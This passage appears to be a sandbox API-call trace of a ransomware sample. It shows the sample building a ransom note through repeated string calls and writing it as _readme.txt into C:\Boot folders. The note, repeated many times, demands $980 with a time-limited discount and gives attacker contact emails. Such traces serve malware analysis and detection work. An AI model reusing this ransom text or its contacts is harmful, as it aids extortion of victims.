more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.856] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.856] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.856] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.856] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.857] CloseHandle (hObject=0x690) returned 1 [0173.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.858] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e6a2280, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e6a2280, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.858] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e6a2280, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e6a2280, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.858] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.858] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e6a2280, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e6a2280, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e6a2280, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.858] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e6a2280, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e6a2280, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e6a2280, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.858] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.858] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.860] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0173.860] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.860] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.860] PathFindFileNameW (pszPath="") returned="" [0173.861] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.861] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.861] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.861] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.861] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0173.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.862] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0173.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.862] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.862] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.862] 